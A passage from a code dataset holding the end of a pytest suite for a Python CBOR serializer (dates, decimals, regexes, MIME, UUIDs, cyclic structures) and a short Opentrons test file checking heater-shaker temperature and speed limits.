(datetime(2013, 3, 21, 20, 4, 0, tzinfo=timezone.utc), True, 'c11a514b67b0'),
(datetime(2013, 3, 21, 22, 4, 0, tzinfo=timezone(timedelta(hours=2))), True, 'c11a514b67b0')
], ids=['datetime/utc', 'datetime+micro/utc', 'datetime/eet', 'naive', 'timestamp/utc',
'timestamp/eet'])
def test_datetime(value, as_timestamp, expected):
expected = unhexlify(expected)
assert dumps(value, datetime_as_timestamp=as_timestamp, timezone=timezone.utc) == expected
def test_date():
expected = unhexlify('c074323031332d30332d32315430303a30303a30305a')
assert dumps(date(2013, 3, 21), timezone=timezone.utc) == expected
def test_naive_datetime():
"""Test that naive datetimes are gracefully rejected when no timezone has been set."""
exc = pytest.raises(CBOREncodeError, dumps, datetime(2013, 3, 21))
exc.match('naive datetime encountered and no default timezone has been set')
@pytest.mark.parametrize('value, expected', [
(Decimal('14.123'), 'c4822219372b'),
(Decimal('NaN'), 'f97e00'),
(Decimal('Infinity'), 'f97c00'),
(Decimal('-Infinity'), 'f9fc00')
], ids=['normal', 'nan', 'inf', 'neginf'])
def test_decimal(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
def test_rational():
expected = unhexlify('d81e820205')
assert dumps(Fraction(2, 5)) == expected
def test_regex():
expected = unhexlify('d8236d68656c6c6f2028776f726c6429')
assert dumps(re.compile(u'hello (world)')) == expected
def test_mime():
expected = unhexlify(
'd824787b436f6e74656e742d547970653a20746578742f706c61696e3b20636861727365743d2269736f2d38'
'3835392d3135220a4d494d452d56657273696f6e3a20312e300a436f6e74656e742d5472616e736665722d456'
'e636f64696e673a2071756f7465642d7072696e7461626c650a0a48656c6c6f203d413475726f')
message = MIMEText(u'Hello \u20acuro', 'plain', 'iso-8859-15')
assert dumps(message) == expected
def test_uuid():
expected = unhexlify('d825505eaffac8b51e480581277fdcc7842faf')
assert dumps(UUID(hex='5eaffac8b51e480581277fdcc7842faf')) == expected
def test_custom_tag():
expected = unhexlify('d917706548656c6c6f')
assert dumps(CBORTag(6000, u'Hello')) == expected
def test_cyclic_array():
"""Test that an array that contains itself can be serialized with value sharing enabled."""
expected = unhexlify('d81c81d81c81d81d00')
a = [[]]
a[0].append(a)
assert dumps(a, value_sharing=True) == expected
def test_cyclic_array_nosharing():
"""Test that serializing a cyclic structure w/o value sharing will blow up gracefully."""
a = []
a.append(a)
exc = pytest.raises(CBOREncodeError, dumps, a)
exc.match('cyclic data structure detected but value sharing is disabled')
def test_cyclic_map():
"""Test that a dict that contains itself can be serialized with value sharing enabled."""
expected = unhexlify('d81ca100d81d00')
a = {}
a[0] = a
assert dumps(a, value_sharing=True) == expected
def test_cyclic_map_nosharing():
"""Test that serializing a cyclic structure w/o value sharing will fail gracefully."""
a = {}
a[0] = a
exc = pytest.raises(CBOREncodeError, dumps, a)
exc.match('cyclic data structure detected but value sharing is disabled')
@pytest.mark.parametrize('value_sharing, expected', [
(False, '828080'),
(True, 'd81c82d81c80d81d01')
], ids=['nosharing', 'sharing'])
def test_not_cyclic_same_object(value_sharing, expected):
"""Test that the same shareable object can be included twice if not in a cyclic structure."""
expected = unhexlify(expected)
a = []
b = [a, a]
assert dumps(b, value_sharing=value_sharing) == expected
def test_unsupported_type():
exc = pytest.raises(CBOREncodeError, dumps, lambda: None)
exc.match('cannot serialize type function')
def test_default():
class DummyType(object):
def __init__(self, state):
self.state = state
def default_encoder(encoder, value):
encoder.encode(value.state)
expected = unhexlify('820305')
obj = DummyType([3, 5])
serialized = dumps(obj, default=default_encoder)
assert serialized == expected
def test_default_cyclic():
class DummyType(object):
def __init__(self, value=None):
self.value = value
@shareable_encoder
def default_encoder(encoder, value):
state = encoder.encode_to_bytes(value.value)
encoder.encode(CBORTag(3000, state))
expected = unhexlify('D81CD90BB849D81CD90BB843D81D00')
obj = DummyType()
obj2 = DummyType(obj)
obj.value = obj2
serialized = dumps(obj, value_sharing=True, default=default_encoder)
assert serialized == expected
def test_dump_to_file(tmpdir):
path = tmpdir.join('testdata.cbor')
with path.open('wb') as fp:
dump([1, 10], fp)
assert path.read_binary() == b'\x82\x01\x0a'
| 2.0625 | 2 |
api/tests/opentrons/protocol_api/test_module_validation_and_errors.py | Opentrons/protocol_framework | 0 | 12759650 | import pytest
from opentrons.protocol_api.module_validation_and_errors import (
validate_heater_shaker_temperature,
validate_heater_shaker_speed,
InvalidTargetTemperatureError,
InvalidTargetSpeedError,
)
@pytest.mark.parametrize("valid_celsius_value", [37.0, 37.1, 50, 94.99, 95])
def test_validate_heater_shaker_temperature(valid_celsius_value: float) -> None:
"""It should return the validated temperature value."""
validated = validate_heater_shaker_temperature(celsius=valid_celsius_value)
assert validated == valid_celsius_value
@pytest.mark.parametrize("invalid_celsius_value", [-1, 0, 36.99, 95.01])
def test_validate_heater_shaker_temperature_raises(
invalid_celsius_value: float,
) -> None:
"""It should raise an error for invalid temperature values."""
with pytest.raises(InvalidTargetTemperatureError):
validate_heater_shaker_temperature(celsius=invalid_celsius_value)
@pytest.mark.parametrize("valid_rpm_value", [200, 201, 1000, 2999, 3000])
def test_validate_heater_shaker_speed(valid_rpm_value: int) -> None:
"""It should return the validated speed value."""
validated = validate_heater_shaker_speed(rpm=valid_rpm_value)
assert validated == valid_rpm_value
@pytest.mark.parametrize("invalid_rpm_value", [0, 199, 3001])
def test_validate_heater_shaker_speed_raises(invalid_rpm_value: int) -> None:
"""It should raise an error for invalid speed values."""
with pytest.raises(InvalidTargetSpeedError):
validate_heater_shaker_speed(rpm=invalid_rpm_value)
| 2.78125 | 3 |